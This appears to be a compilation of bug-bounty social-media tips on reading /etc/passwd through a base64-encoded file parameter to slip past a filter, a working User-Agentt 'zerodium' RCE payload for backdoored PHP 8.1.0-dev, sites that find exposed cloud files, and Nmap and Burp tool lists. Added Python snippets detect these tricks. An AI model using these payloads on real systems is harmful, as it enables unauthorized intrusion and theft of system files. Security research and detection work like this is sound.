url/?f=etc/passwd ==> 403
encode etc/passwd as base64
url/?f=L2V0Yy9wYXNzd2Q= ==> 200
#note
you can use this trick in SQL, SSTI, XSS, LFI, etc.
By:@GodfatherOrwa
#bugbountytips #BugBounty
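As an added defender-side illustration (not part of the post above): the 403 came from a filter keyed on the literal string, so a check worth keeping must normalize the parameter value (URL-decode, then try base64, for a few rounds) before looking for the pattern. The pattern and the sample values are constructed for this example.

```python
import base64
import binascii
import re
from urllib.parse import unquote

# Constructed pattern standing in for whatever the naive filter keyed on.
TRAVERSAL_RE = re.compile(r"\.\./|etc/passwd", re.IGNORECASE)


def try_base64(value: str):
    """Return the decoded text if value is base64 (standard or URL-safe alphabet)
    that yields printable UTF-8, otherwise None."""
    std = value.replace("-", "+").replace("_", "/")
    padded = std + "=" * (-len(std) % 4)
    try:
        raw = base64.b64decode(padded, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        return None
    return text if text and text.isprintable() else None


def normalized_forms(value: str, max_rounds: int = 3) -> set:
    """Collect the raw value plus its URL-decoded and base64-decoded variants,
    repeating a few rounds so double-encoded inputs are covered too."""
    forms = {value}
    frontier = {value}
    for _ in range(max_rounds):
        new = set()
        for form in frontier:
            for candidate in (unquote(form), try_base64(form)):
                if candidate and candidate not in forms:
                    new.add(candidate)
        if not new:
            break
        forms |= new
        frontier = new
    return forms


def is_blocked(value: str) -> bool:
    """True if any decoded form of the parameter matches the traversal pattern."""
    return any(TRAVERSAL_RE.search(form) for form in normalized_forms(value))
```

Decoding candidate encodings improves detection, but the durable fix is to map a short allowlisted name to a server-side path instead of accepting a path from the client at all.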
Find public files in Amazon S3
http://s3digger.com
Find public files in Dropbox
https://drodigger.com
Find public files in Disk Yandex
https://yadigger.com
Find public files in Google Drive
https://drodigger.com
Find public files in other file sharing sites
https://fidigger.com
Find public files on url shortening sites
https://shortdigger.com
/****/: This is a directory traversal sequence, which is used to navigate through the file system. The **** is a common pattern used to traverse directories, allowing an attacker to access files outside of the web root.
👁 Nmap Cheat Sheet 2024: All the Commands & Flags.
https://www.stationx.net/nmap-cheat-sheet/
• Host Discovery;
• Output Format Scan;
• Understanding Nmap Packet Trace;
• Nmap Scan with Timing Parameters;
• Nmap Scans using Hex Value of Flags;
• Forensic Investigation of Nmap Scan using Wireshark;
• Understanding Guide for Nmap Timing Scan (Firewall Bypass);
• Understanding Guide for Nmap Ping Scan (Firewall Bypass);
• Comprehensive Guide on Nmap Port Status;
• How to Detect NMAP Scan Using Snort;
• Understanding Guide to Nmap Firewall Scan (Part 2);
• Understanding Guide to Nmap Firewall Scan (Part 1);
• Understanding Nmap Scan with Wireshark;
• Password Cracking using Nmap;
• Vulnerability Scan;
• Network Scanning using NMAP (Beginner Guide);
• MSSQL Penetration Testing using Nmap;
• MySQL Penetration Testing with Nmap.
Money comes, money goes. Focus on learning.
In the world of bug bounty hunting, it's easy to get caught up in the pursuit of monetary rewards. However, remember that money comes and goes. The real value lies in the skills and knowledge you gain along the way. Every vulnerability you uncover, every system you test, and every report you write contributes to your growth as a cybersecurity expert. Prioritize learning and honing your craft, and the financial rewards will naturally follow. Stay curious, stay dedicated, and let your passion for learning be your true guide.
Thanks,
The Brut Security Team
Complete Guide on Attack Surface Discovery 🔍
Check out our latest article detailing the steps a cybersecurity researcher can follow to construct an Attack Surface using Netlas.io and other tools. Don't miss it! 🔥
👉🏻 Read now: https://netlas.io/blog/attack_surface_discovery_guide/
❗️Netlas' blog is now available at netlas.io/blog❗️
(^|^[^:]+:\/\/|[^\.]+\.)example.*
(^|^[^:]+:\/\/): Matches the protocol and subdomain (if any) before the main domain example.
([^\.]+\.): Matches the subdomain (if any) before the main domain example.
example: The main domain name, replaced with example in this example.
.*: Matches any characters (including none) after the main domain name.
Protocols like http:// or https://
Subdomains like sub.example or foo.bar.example
Paths and query strings like /path/to/resource?param=value
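An added check (not part of the post) that runs the pattern above against constructed URLs and shows where it over-matches: the third alternative is unanchored, so a search finds the domain inside a query string, and the trailing `.*` accepts anything after "example", including a different registrable domain. Beside it is a hostname-based alternative that assumes example.com as the root domain.

```python
import re
from urllib.parse import urlsplit

# The post's scope pattern, as written (with "example" as the placeholder domain).
SCOPE_RE = re.compile(r"(^|^[^:]+:\/\/|[^\.]+\.)example.*")


def in_scope_regex(url: str) -> bool:
    """Apply the post's pattern the way most tools do: an unanchored search."""
    return SCOPE_RE.search(url) is not None


def in_scope_host(url: str, root: str = "example.com") -> bool:
    """Hardened alternative (assumed root domain example.com): decide on the parsed
    hostname only, so paths, query strings and look-alike domains cannot match."""
    if "://" not in url:
        url = "//" + url  # let urlsplit treat a bare domain as the netloc
    host = (urlsplit(url).hostname or "").rstrip(".")
    return host == root or host.endswith("." + root)
```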
1. Burp JS Link Finder: Finds JavaScript files and links on the target website.
2. Param Miner: Analyzes HTTP requests and responses to identify potential parameter manipulation vulnerabilities.
3. Logger++: Enhances the logging capabilities of Burp, making it easier to analyze and filter log data.
4. Turbo Intruder: Automates and accelerates the process of sending multiple requests to a target system.
5. SQLMap: Detects and exploits SQL injection vulnerabilities in the targeted scope.
Find a server running PHP 8.1.0-dev ❓
🚨 Check for easy RCE 🚨
👇 Payload:
User-Agentt: zerodiumsleep(5);
User-Agentt: zerodiumsystem('id');
#bugbountytips #bugbounty
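Added detection example, not from the post: a small parser for raw HTTP messages (the samples are constructed) that flags the misspelled User-Agentt request header the backdoored PHP 8.1.0-dev build reads, and the version banner that identifies such a build in a response.

```python
def parse_headers(raw: str) -> dict:
    """Parse the header block of a raw HTTP message into a dict keyed by
    lowercased header name; stops at the blank line that ends the headers."""
    headers = {}
    for line in raw.replace("\r\n", "\n").split("\n")[1:]:  # skip start line
        if not line.strip():
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers


def backdoor_findings(raw_request: str) -> list:
    """Findings for a request: the misspelled header alone is odd enough to log;
    the 'zerodium' trigger string in its value is the backdoor being exercised."""
    findings = []
    ua_t = parse_headers(raw_request).get("user-agentt")
    if ua_t is not None:
        findings.append("request carries the misspelled User-Agentt header")
        if "zerodium" in ua_t.lower():
            findings.append("User-Agentt value contains the backdoor trigger string")
    return findings


def exposed_version(raw_response: str) -> bool:
    """True if a response banner advertises the PHP 8.1.0-dev build."""
    h = parse_headers(raw_response)
    banner = " ".join(h.get(k, "") for k in ("x-powered-by", "server"))
    return "php/8.1.0-dev" in banner.lower()


# Constructed samples (host name is a placeholder).
SUSPECT = ("GET / HTTP/1.1\r\nHost: app.example\r\n"
           "User-Agentt: zerodiumsleep(5);\r\n\r\n")
BENIGN = ("GET / HTTP/1.1\r\nHost: app.example\r\n"
          "User-Agent: Mozilla/5.0\r\n\r\n")
RESPONSE = ("HTTP/1.1 200 OK\r\nX-Powered-By: PHP/8.1.0-dev\r\n"
            "Content-Type: text/html\r\n\r\n<html></html>")
```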